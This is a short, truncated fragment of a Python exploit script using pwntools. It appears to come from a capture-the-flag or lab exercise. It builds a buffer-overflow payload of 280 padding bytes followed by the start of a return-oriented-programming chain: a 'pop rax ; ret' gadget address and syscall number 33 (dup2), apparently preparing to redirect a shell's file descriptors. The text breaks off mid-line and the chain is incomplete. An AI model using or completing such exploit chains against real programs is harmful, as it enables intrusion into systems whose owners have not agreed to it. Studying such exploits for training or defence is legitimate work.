from pwn import * from struct import pack # Padding goes here p = b'A' * 280 # dups p += p64(0x00000000004021dc) # pop rax ; ret p += p64(33) # dup2 p += pack('